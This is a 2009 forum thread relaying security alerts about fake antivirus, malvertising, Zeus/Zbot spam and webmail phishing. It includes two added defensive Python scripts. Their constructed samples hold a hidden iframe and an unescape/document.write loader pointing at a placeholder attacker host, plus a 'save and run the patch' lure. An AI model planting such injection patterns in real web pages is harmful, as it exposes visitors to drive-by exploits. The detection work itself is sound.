
SPAM frauds, fakes, and other MALWARE deliveries...


2072 replies to this topic

#181 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 19 September 2009 - 08:33 AM

FYI...

PBS site hacked - used to serve exploits
- http://www.threatpos...ve-exploits-118
September 18, 2009 - "Some sections of the popular PBS.org Web site have been hijacked by hackers serving up a cocktail of dangerous exploits. According to researchers at Purewire*, attempts to access certain PBS Web site pages yielded JavaScript that serves exploits from a malicious domain via an iframe. The malicious JavaScript was found on the "Curious George" page that provides content on the popular animation series. A look at the code on the hijacked site shows malicious activity coming from a third-party .info domain. The URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader (CVE-2008-2992, CVE-2009-0927, and CVE-2007-5659), AOL Radio AmpX (CVE-2007-6250), AOL SuperBuddy (CVE-2006-5820) and Apple QuickTime (CVE-2007-0015)..."
* http://blog.purewire...-Serve-Exploits

:ph34r: :ph34r:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
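Added example, not part of the original post or of the Threatpost/Purewire write-ups it quotes: a small Python checker for the injection pattern described above, an iframe or script pulling from a host other than the site's own (usually hidden), plus inline JavaScript that unpacks such an iframe with unescape()/document.write(). The sample page, the site host pbs.example and the placeholder domain example-attacker.invalid are constructed; the post does not name the real .info domain.

```python
"""Flag injected off-site iframes/scripts and obfuscated inline JavaScript.

Added example for the PBS compromise described above; it is not code from
the Threatpost or Purewire write-ups. The HTML below is constructed and
example-attacker.invalid stands in for the unnamed .info domain.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE_HINTS = ("display:none", "visibility:hidden")
# Functions commonly used to unpack an injected iframe at page load.
OBFUSCATION_MARKERS = ("unescape(", "eval(", "fromCharCode", "document.write(")


class _ScriptAndFrameCollector(HTMLParser):
    """Collect iframe/script elements with a src, plus inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.embeds = []      # (tag, attrs) for <iframe src> / <script src>
        self.inline_js = []   # text of <script> blocks that have no src
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "script"):
            return
        a = dict(attrs)
        if a.get("src"):
            self.embeds.append((tag, a))
        elif tag == "script":
            self._in_inline_script = True

    def handle_data(self, data):
        if self._in_inline_script:
            self.inline_js.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False


def find_offsite_embeds(html, site_host):
    """Return iframes/scripts loaded from a host other than site_host.

    Each finding records the tag, src, host and whether the element is hidden
    (zero-size or display:none), the usual shape of a drive-by injection.
    """
    p = _ScriptAndFrameCollector()
    p.feed(html)
    findings = []
    for tag, attrs in p.embeds:
        host = urlparse(attrs["src"]).hostname
        if host is None or host == site_host or host.endswith("." + site_host):
            continue  # relative or same-site reference
        style = (attrs.get("style") or "").replace(" ", "").lower()
        w, h = attrs.get("width", ""), attrs.get("height", "")
        hidden = any(hint in style for hint in HIDDEN_STYLE_HINTS) or (
            w in ("0", "1") and h in ("0", "1"))
        findings.append({"tag": tag, "src": attrs["src"], "host": host, "hidden": hidden})
    return findings


def find_obfuscated_inline_js(html):
    """Return inline <script> blocks that use typical unpacking primitives."""
    p = _ScriptAndFrameCollector()
    p.feed(html)
    hits = []
    for js in p.inline_js:
        markers = [m for m in OBFUSCATION_MARKERS if m in js]
        if markers:
            hits.append({"markers": markers, "snippet": js.strip()[:60]})
    return hits


# Constructed page: one legitimate same-site script, one off-site hidden
# iframe and one inline script that writes a second iframe via unescape().
SAMPLE_PAGE = """<html><body>
<script src="/js/site.js"></script>
<script src="http://static.pbs.example/lib.js"></script>
<script>var series = "curious-george";</script>
<iframe src="http://example-attacker.invalid/in.php" width="0" height="0"
        style="display: none"></iframe>
<script>document.write(unescape('%3Ciframe src=%22http://example-attacker.invalid/x.php%22%3E'))</script>
</body></html>"""

if __name__ == "__main__":
    for f in find_offsite_embeds(SAMPLE_PAGE, "pbs.example"):
        print("off-site", f["tag"], f["src"], "hidden" if f["hidden"] else "visible")
    for h in find_obfuscated_inline_js(SAMPLE_PAGE):
        print("obfuscated inline script:", h["markers"], h["snippet"])
```

Run it against the saved HTML of a page you suspect (fetch it with a non-browser client so the exploit kit's JavaScript never executes). Same-site hosts are whitelisted by suffix only, so a legitimate third-party CDN will show up as a finding too; treat the output as a triage list, not a verdict.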



#182 AplusWebMaster


Posted 21 September 2009 - 04:20 AM

FYI...

Fake Twitter accounts for Fake AV
- http://www.f-secure....s/00001773.html
September 20, 2009 - "We're seeing more and more fake Twitter accounts being auto-generated by the bad boys. The profiles look real. They have variable account and user names (often German) and different locations (US cities). They even upload different Twitter wallpapers automatically... All the tweets sent by these accounts are auto-generated, either by picking up keywords from Twitter trends or by repeating real tweets sent by humans. And where do all the links eventually end up to? Of course, they lead to fake websites trying to scare you into purchasing a product you don't need..."

(Screenshots available at the URL above.)

- http://www.sophos.co...attack-twitter/
September 21, 2009

:ph34r: <_< :ph34r:

Edited by AplusWebMaster, 22 September 2009 - 06:37 AM.



#183 AplusWebMaster


Posted 21 September 2009 - 04:46 PM

FYI...

Monopoly Game malware...
- http://securitylabs....lerts/3481.aspx
09.21.2009 - "Websense... discovered a new spam campaign that is targeting players of the Monopoly game. The Monopoly World Championships take place every four years, and Las Vegas is the host city of 2009. Because the Monopoly Regional Championships are going on all over the world and many Monopoly enthusiasts take part, the spammers utilize this chance to play their tricks. Our email honeypot systems detected over 30 thousand Monopoly spam messages on September 21, 2009 alone. The spam uses a social networking technique to "invite" you to play the online board game. It then provides a link to the fake Monopoly game download site, which in fact downloads a Trojan..."

(Screenshots available at the URL above.)

:ph34r: <_< :ph34r:



#184 AplusWebMaster


Posted 24 September 2009 - 08:07 AM

FYI...

Fake Malwarebytes - Bogus Sponsored Link Leads to FAKEAV
- http://blog.trendmic...eads-to-fakeav/
Sep. 24, 2009 - "Apart from SEO poisoning, cybercriminals have found another avenue to proliferate FAKEAV malware - bogus sponsored links (sitio patrocinados in Spanish). Just recently, Trend Micro researchers were alerted to malicious search engine ads that appeared in Microsoft’s Bing and AltaVista, among others, when a user searches the string “malwarebytes.” (Malwarebytes is a free antivirus product, but of course, not a FakeAV.) Clicking the malicious URL points the user to an executable file named MalwareRemovalBot.exe-1 (detected by Trend Micro as TROJ_FAKEAV.DMZ). Upon execution, the rogue antivirus displays false information that the system is infected with files that do not even exist... In the past, cybercriminals employed the same tactic when it hitchhiked on Trend Micro. Some Google searches then showed banner ads that led to a fraudulent Trend Micro website. Though the ads may not appear in all regions, all users are still strongly advised to be extra careful when clicking links in search engines..."

(Screenshots available at the URL above.)

:ph34r: <_< :ph34r:



#185 AplusWebMaster


Posted 25 September 2009 - 08:19 AM

FYI...

Malvertisements - weekend run...
- http://blog.scansafe...rtisements.html
September 24, 2009 - "Between Sep 19-21, malicious banner ads were served via multiple popular sites, including drudgereport.com, lyrics.com, horoscope.com and slacker.com. The ads delivered a trojan downloader using a variety of Adobe PDF exploits as well as the Microsoft ActiveX DirectShow exploit described in MS09-032. Detection of the malicious PDF is quite low, with only 3 out of 41 scanners detecting, as seen in this VirusTotal report*... Attackers use online ads for the same reasons a legitimate company would do so. When an attacker can infiltrate an advertising network, it enables them to reach a broad number of websites within a chosen category. This provides the attacker with the same return on investment that it would a legitimate advertiser – broad exposure to the audience of their choosing..."

- http://www.theregist...s_google_yahoo/
24 September 2009 - "... They were delivered over networks belonging to Google's DoubleClick; Right Media's Yield Manager (owned by Yahoo); and Fastclick, owned by an outfit called ValueClick... the payload installed Win32/Alureon, a trojan that drops a backdoor on infected machines... also appeared on slacker.com ..."

- http://www.virustota...023b-1253635686
File 201f338a343e02a41dc7a5344878b862 received on 2009.09.22 16:08:06 (UTC)
Current status: finished
Result: 3/41 (7.32%)

:ph34r: <_< :ph34r:



#186 AplusWebMaster


Posted 28 September 2009 - 05:42 AM

FYI...

Fake IRS email SPAM - w/Zeus Trojan...
- http://www.computerw...l_virus_problem
September 25, 2009 - "Criminals are waging a nasty online campaign right now, hoping that their victims' fears of the tax collector will lead them to inadvertently install malicious software. The spam campaign, entering its third week now, is showing no signs of slowing down, according to Gary Warner*, director of research in computer forensics with the University of Alabama at Birmingham. This one campaign accounts for about 10 percent of the spam e-mail that his group is presently tracking, he said... Since first spotting the spam on Sept. 9, antispam vendor Cloudmark has counted 11 million messages sent to the company's nearly 2 million desktop customers... What makes this campaign particularly ugly is that the malware that accompanies the fake IRS messages is a variant of the hard-to-detect Zeus Trojan. This software hacks into bank accounts and drains them of money as part of a widespread financial fraud scheme. Researchers estimate that the Zeus criminals are emptying more than a million dollars per day out of victims' bank accounts with the software. Small businesses have been particularly hard-hit by this fraud, because banks have sometimes held them accountable for the losses..."
* http://garwarner.blo...-continues.html

- http://blog.trendmic...other-irs-scam/

- http://www.irs.gov/p....html?portlet=1

- http://www.us-cert.g...reading_via_irs
September 28, 2009

:ph34r: <_<

Edited by AplusWebMaster, 28 September 2009 - 09:20 AM.



#187 AplusWebMaster


Posted 28 September 2009 - 07:23 AM

FYI...

Phishing attacks reach record levels in Q2 2009
- http://www.markmonit...r090928-bji.php
September 28 2009 - "...
• During Q2 2009, phish attacks reached record levels with more than 151,000 unique attacks
• The average number of phishing attacks per organization also increased to record levels, with 351 attacks per organization, on average, in Q2 2009
• Social networking attacks continued to rise significantly, recording a 168% increase from the same period in 2008
• Brands in the financial and payment services industries are the most heavily-targeted industry categories for phishers, constituting 80 percent of all phish attacks in Q2 2009..."

:ph34r: :ph34r:



#188 AplusWebMaster


Posted 29 September 2009 - 01:49 PM

FYI...

Tropical Storm leads to FAKEAV
- http://blog.trendmic...eads-to-fakeav/
Sep. 29, 2008 - "Cybercriminals leveraged on the tropical storm, Ondoy (International name: Ketsana) that hit the Philippines and killed around 140 people... several malicious sites that appeared each time the users search the strings, “manila flood,” “Ondoy Typhoon,” and “Philippines Flood,” among others. The said sites emerged as one of the top search results. Once the user clicks the URL, they will be redirected to several landing pages where they are asked to download an EXE file, soft_207.exe. Trend Micro detects it as TROJ_FAKEAV.BND. This attack does GeoIP checks, which mean it only targets specific regions or location... Although riding on tragic events is not exactly new, what is notable is it employed once again blackhat SEO to lead users to a FAKEAV..."

(Screenshots available at the URL above.)

:ph34r: <_< :ph34r:



#189 AplusWebMaster


Posted 30 September 2009 - 05:20 AM

FYI...

Rogue downloader uses Firefox warning screen lookalike
- http://sunbeltblog.b...ox-warning.html
September 29, 2009 - "... The rogue Alpha AntiVirus page used to hijack a browser copies the Firefox warning screen... Looks like the Firefox warning page ( in Internet Explorer ), but with a difference... What makes research on these rogues very challenging is the fact that they swap the download web sites about every six hours..."

(Screenshots available at the URL above.)

:ph34r: <_< :ph34r:



#190 AplusWebMaster


Posted 01 October 2009 - 10:34 PM

FYI...

Fraudsters on social networking sites
- http://www.ic3.gov/m...009/091001.aspx
October 1, 2009 - "Fraudsters continue to hijack accounts on social networking sites and spread malicious software by using various techniques. One technique involves the use of spam to promote phishing sites, claiming there has been a violation of the terms of agreement or some other type of issue which needs to be resolved. Other spam entices users to download an application or view a video. Some spam appears to be sent from users' "friends", giving the perception of being legitimate. Once the user responds to the phishing site, downloads the application, or clicks on the video link, their computer, telephone or other digital device becomes infected. Another technique used by fraudsters involves applications advertised on social networking sites, which appear legitimate; however, some of these applications install malicious code or rogue anti-virus software. Other malicious software gives the fraudsters access to your profile and personal information. These programs will automatically send messages to your "friends" list, instructing them to download the new application too. Infected users are often unknowingly spreading additional malware by having infected Web sites posted on their Webpage without their knowledge. Friends are then more apt to click on these sites since they appear to be endorsed by their contacts..."

(Tips on avoiding these tactics available at the URL above.)

:ph34r: :ph34r:

Edited by AplusWebMaster, 01 October 2009 - 10:35 PM.




#191 AplusWebMaster


Posted 02 October 2009 - 07:08 AM

FYI...

Rogue AV growth 2009-H1 585 percent
- http://www.theregist...imeware_plague/
2 October 2009 - "The prevalence of scareware packages has reached epidemic proportions, with 485,000 different samples detected in the first half of 2009 alone. The figure is more than five times the combined figure for the whole of 2008, according to statistics from the Anti-Phishing Working Group (APWG). The huge figures are explained by the hacker practice of changing the checksum of every file. The tactic is designed to foil less sophisticated anti-malware defences... More than half (54 per cent) or 11.9 million of the computers scanned by Panda Security, which contributed to APWG's report, were infected with some form of malware. Banking trojan infections detected by the group almost tripled (up 186 per cent) between Q4 2008 and Q2 2009. APWG's report can be found here*."
* http://www.antiphish...ort_h1_2009.pdf

:ph34r: <_< :ph34r:



#192 AplusWebMaster


Posted 06 October 2009 - 05:47 AM

FYI...

Hotmail user info leaked...
- http://blog.trendmic...rmation-leaked/
Oct. 6, 2009

Time to change your hotmail password
- http://isc.sans.org/...ml?storyid=7276
Last Updated: 2009-10-05 23:33:47 UTC - "... Microsoft has confirmed that thousands of Windows Live accounts have been compromised with their passwords posted online... Some information is posted here*..."
* http://windowslivewi...mp;sa=363915619
10/5/2009

:ph34r:



#193 AplusWebMaster


Posted 06 October 2009 - 12:05 PM

FYI...

Gmail, AOL, Yahoo all hit by webmail phishing scam
- http://www.theregist..._webmail_phish/
6 October 2009 - "Google has confirmed that Gmail has also been targeted by an "industry-wide phishing scheme" which first hit Hotmail accounts. Yahoo! and AOL are also reportedly affected. Hackers used fake websites to gain the login credentials attached to various webmail accounts. The attack emerged after a list of 30,000 purloined usernames and passwords was posted online. These leaked details reportedly referred to Gmail, Comcast and Earthlink accounts. A second list containing webmail addresses and passwords referring to Hotmail, Yahoo, AOL and Gmail also surfaced online. Some of the addresses on this list were old and fake, but at least some were genuine, the BBC reports*. Both lists have been taken offline, so are no longer directly accessible. The search engine giant confirmed that an unspecified number of accounts were compromised, adding that it had reset the passwords of the compromised accounts... The combined incidents serve to further illustrate the importance of password security. Using a different, hard-to-guess password on every site is a very good start in this direction."
* http://news.bbc.co.u...ogy/8292928.stm

- http://www.eset.com/...6/webmail-hacks
October 6, 2009 - "... If you receive an email telling you to provide your password it is a phish. That is as simple as it gets. Never give out your password..."

:ph34r: :ph34r:

Edited by AplusWebMaster, 07 October 2009 - 03:01 AM.



#194 AplusWebMaster


Posted 07 October 2009 - 03:20 AM

FYI...

FBI warns public of fraudulent SPAM email
- http://www.us-cert.g...stigation_warns
October 6, 2009 - "The Federal Bureau of Investigation (FBI) has released information warning the public about fraudulent email messages purporting to come from the FBI or the Department of Homeland Security. These email messages contain a malicious attachment that claims to provide an intelligence report or bulletin, but in reality attempts to launch malware on the user's system. More information regarding these messages can be found in the Federal Bureau of Investigation's New E-Scams and Warnings web site*. To help protect against this type of attack, US-CERT recommends that users avoid opening attachments contained in unsolicited email messages..."
* http://www.fbi.gov/c...vest/escams.htm

:ph34r:



#195 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 13 October 2009 - 09:02 AM

FYI...

SSL SPAM... w/Zbot
- http://isc.sans.org/...ml?storyid=7333
Last Updated: 2009-10-13 13:13:34 UTC - "... started receiving SPAM messages along the following lines:
'On October 16, 2009 server upgrade will take place. Due to this the system may be offline for approximately half an hour. The changes will concern security, reliability and performance of mail service and the system as a whole. For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure. This procedure is quite simple. All you have to do is just to click the link provided, to save the patch file and then to run it from your computer location. That's all.
http ://evil-link/evil-file
Thank you in advance for your attention to this matter and sorry for possible inconveniences...'

UPDATE
the sample file we received was named patch.exe MD5=9abc553703f4e4fedb3ed975502a2c7a
ZBOT characteristics, so trojan, keylogger, disables AV.
http://www.threatexp...b3ed975502a2c7a
"... Trojan-Spy.Zbot.YETH - Trojan-Spy.Zbot.YETH is a rootkit trojan which steals online banking information and downloads other malware as well..."

... ThreatExpert on the file... http://www.threatexp...ddfd9c50b0015c9
"... Trojan-Spy.Zbot.YETH - Trojan-Spy.Zbot.YETH is a rootkit trojan which steals online banking information and downloads other malware as well..."
___

- http://blog.trendmic...ious-companies/
Oct. 14, 2009

:ph34r: :ph34r:

Edited by AplusWebMaster, 14 October 2009 - 07:15 AM.

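Added example, not part of the original post or of the ISC diary/ThreatExpert entries it quotes: a Python triage helper for the "save the patch file and run it" lure above. It pulls the links out of a message body (tolerating the "http ://" spacing seen in forwarded samples), flags links that point at an executable, scores the social-engineering cues, and hashes a dropped file against a known-bad list. The message body and the file bytes are constructed; update.example.invalid is a placeholder for the real link, and the only real value used is the patch.exe MD5 the diary reports.

```python
"""Triage a 'save the patch and run it' lure and hash-check the dropped file.

Added example for the SSL-upgrade spam above; it is not code from the ISC
diary or ThreatExpert. The message body and the file bytes are constructed;
update.example.invalid is a placeholder for the real link, and the MD5 in
KNOWN_BAD_MD5 is the one the diary reports for patch.exe.
"""
import hashlib
import re
from urllib.parse import urlparse

KNOWN_BAD_MD5 = {"9abc553703f4e4fedb3ed975502a2c7a"}

EXEC_EXTENSIONS = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js")
# Phrases from the lure that ask the reader to fetch and execute something.
LURE_CUES = ("server upgrade", "certificates update", "save the patch", "run it")
# Tolerate the "http ://" defanging/spacing seen in forwarded samples.
URL_RE = re.compile(r"\bhttps?\s*:\s*//[^\s<>\"']+", re.IGNORECASE)


def extract_urls(body):
    return [re.sub(r"\s*:\s*//", "://", m) for m in URL_RE.findall(body)]


def is_executable_link(url):
    return urlparse(url).path.lower().endswith(EXEC_EXTENSIONS)


def triage_message(body):
    """Score a message: 2 points per link to an executable, 1 per lure cue."""
    urls = extract_urls(body)
    exe_links = [u for u in urls if is_executable_link(u)]
    cues = [c for c in LURE_CUES if c in body.lower()]
    score = 2 * len(exe_links) + len(cues)
    return {"urls": urls, "executable_links": exe_links, "cues": cues,
            "score": score, "suspicious": score >= 3}


def file_hashes(data):
    """MD5 (to match older IOC lists like the diary's) and SHA-256."""
    return {"md5": hashlib.md5(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest()}


def matches_known_bad(data):
    return file_hashes(data)["md5"] in KNOWN_BAD_MD5


# Constructed body paraphrasing the lure quoted in the post.
SAMPLE_BODY = """On October 16, 2009 server upgrade will take place.
For compatibility of your mail client you should run the SSL certificates update procedure.
All you have to do is click the link, save the patch file and run it.
http ://update.example.invalid/patch.exe
Thank you for your attention to this matter."""

if __name__ == "__main__":
    verdict = triage_message(SAMPLE_BODY)
    print("links:", verdict["urls"])
    print("executable links:", verdict["executable_links"])
    print("cues:", verdict["cues"], "score:", verdict["score"],
          "suspicious:", verdict["suspicious"])
    # Constructed stand-in for the attachment; it will not match the real IOC.
    sample = b"MZ" + b"\x00" * 62
    print("hashes:", file_hashes(sample), "known bad:", matches_known_bad(sample))
```

The hash check is only as good as the list it is fed: the diary's MD5 identifies one build of the dropper, and the VirusTotal numbers elsewhere in this thread show how often repacked samples slip past signature matching, so treat the lure scoring as the first line and the hash match as confirmation rather than the other way round.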
